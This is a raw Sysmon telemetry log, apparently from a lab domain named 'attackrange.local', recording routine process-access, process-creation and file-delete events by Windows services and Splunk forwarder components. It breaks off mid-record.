07:54:25.669{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807937Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:25.669{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807936Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:25.669{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807935Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:25.669{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807934Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:25.669{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807933Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:25.653{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807932Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:25.653{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807931Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:25.653{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807930Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:25.653{0C1E0330-048F-60E8-0500-00000000D001}412996C:\Windows\system32\csrss.exe{0C1E0330-F531-60EB-8379-00000000D001}852C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000807929Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:25.653{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F531-60EB-8379-00000000D001}852C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000807928Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:25.654{0C1E0330-F531-60EB-8379-00000000D001}852C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000807927Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:25.513{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A9C9B541F52FBBEA5FE01F1B1BF7BDF3,SHA256=F15505030DA50280DCF49F6AC99EDC058BB64B4D95B0F920B579DA300FBE8A8C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807926Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:25.513{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4117584B0689AB6A4305AEAFC822FDD5,SHA256=5DFE4985E68D8A25FBA618A728D0312F7C61865462DB7D40FCDBE149B117A880,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807925Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:25.294{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=94713183BBF9410A95976DE230C19F5C,SHA256=B42E61D239A8CCAB8CDD4DF99C0A0546A4CC3F181B56AF65B4F715F7D6C9D150,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000807924Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:24.997{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F530-60EB-8279-00000000D001}3548C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807923Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:24.997{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807922Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:24.997{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807921Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:24.997{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807920Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:24.997{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807919Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:24.997{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807918Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:24.997{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807917Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:24.997{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807916Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:24.997{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807915Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:24.997{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807914Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:24.997{0C1E0330-048F-60E8-0500-00000000D001}412996C:\Windows\system32\csrss.exe{0C1E0330-F530-60EB-8279-00000000D001}3548C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000807913Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:24.997{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F530-60EB-8279-00000000D001}3548C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000807912Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:24.982{0C1E0330-F530-60EB-8279-00000000D001}3548C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001049684Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:26.714{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=61233C6B777625FDC07455DFA842F275,SHA256=051B6F3738BDF0F103669D1E60D766A3D8766E166893F35AB9205184DAE5AE47,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807955Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:26.794{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 